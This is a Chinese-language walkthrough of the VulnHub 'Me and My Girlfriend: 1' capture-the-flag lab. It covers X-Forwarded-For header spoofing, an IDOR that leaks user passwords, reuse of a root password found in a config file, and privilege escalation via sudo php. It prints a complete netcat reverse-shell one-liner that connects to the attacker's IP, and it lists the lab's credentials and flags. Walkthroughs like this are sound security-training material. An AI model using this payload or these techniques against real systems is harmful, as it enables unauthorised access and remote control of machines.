VulnHub-Me and My Girlfriend: 1-Walkthrough

靶机地址：https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
靶机难度：中级（CTF）
靶机发布日期：2019年12月13日
靶机描述：
自Bulldog Industries遭受数次数据泄露以来已经过去了三年。在那时，他们已经恢复并重新命名为Bulldog.social，这是一家新兴的社交媒体公司。您可以接受这一新挑战并在他们的生产Web服务器上扎根吗？
这是标准的启动到根。您唯一的目标是进入根目录并查看祝贺消息，该如何操作取决于您！
难度：中级，有些事情您可能从未见过。仔细考虑所有问题:)
作者：大余
时间：2020-02-07
请注意：对于所有这些计算机，我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

在这里插入图片描述
我们在VM中需要确定攻击目标的IP地址，需要使用nmap获取目标IP地址：

我们已经找到了此次CTF目标计算机IP地址：192.168.56.142

nmap发现22、80端口开放着…

该WEB只能在本地访问…

是使用x-forwarded-for标头访问页面的…
在这里插入图片描述

利用burpsuite分析发现，利用x-forwarded-for注入可以正常访问，但是每次点下页面都需要注入一次很烦…就下载了插件…

在注册页面注册了dayu用户密码…因为dirb、nikto、gobuster和wfuzz枚举出来的页面都没啥有用的信息，跳过…
可以看到配置文件标题表示为user_id，对于dayu用户，它在URL中显示user-id=12…
在这里插入图片描述

这边我前面利用sqlmap测试了，并尝试使用LFI，都没效果…
这边可以看到我把12改成了1，选择Profile，出现了eweuhtandingan用户名…密码是密文，我尝试在前端源码修改下能否看到…

passwd修改为text，可以看到明文出现了：skuyatuh，用户：eweuhtandingan
在这里插入图片描述
获得用户名：aingmaung 密码：qwerty!!!

回到最初作者给的提示，可以看到存在Alice用户，直接找到即可…

成功找到用户：alice，密码：4lic3

二、提权

在这里插入图片描述
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
经过查看，在进来的目录下有两个隐藏文件，进入cache是空的，在my_secret下正常获得了flag1…

我本来想看看html下有什么PHP或者shell能直接利用的…发现了三个隐藏文件，分析下…
在这里插入图片描述
？？？这里看到了root疑似密码：ctf_pasti_bisa，ceban_corp应该是数据库密码？ …等会试试，先继续看看…

在halamanPerusahaan隐藏文件中没啥利用的…

在misc中php文件的意思就是访问login或者register是login就执行…等等…没啥用
在这里插入图片描述
这里尝试了三个密码，就只有ctf_pasti_bisa正确登录了…

这些信息都是知道的…没啥用!!!

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
数据库没发现好的信息…直接尝试进root用户，发现成功…成功获得了root权限和查看了flag1和2…
这边前面进来我就习惯的sudo-l，发现还有另外提权的方法，继续讲…
在这里插入图片描述
(root) NOPASSWD: /usr/bin/php
可以看到这里的php可以提权…将php置于交互模式，并执行一个反向shell即可提权…go （这里shell随便写就是，非常多方法）

命令：sudo .... -a
命令：echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.103 443 >/tmp/f");
成功提权…另附上：php提权参考链接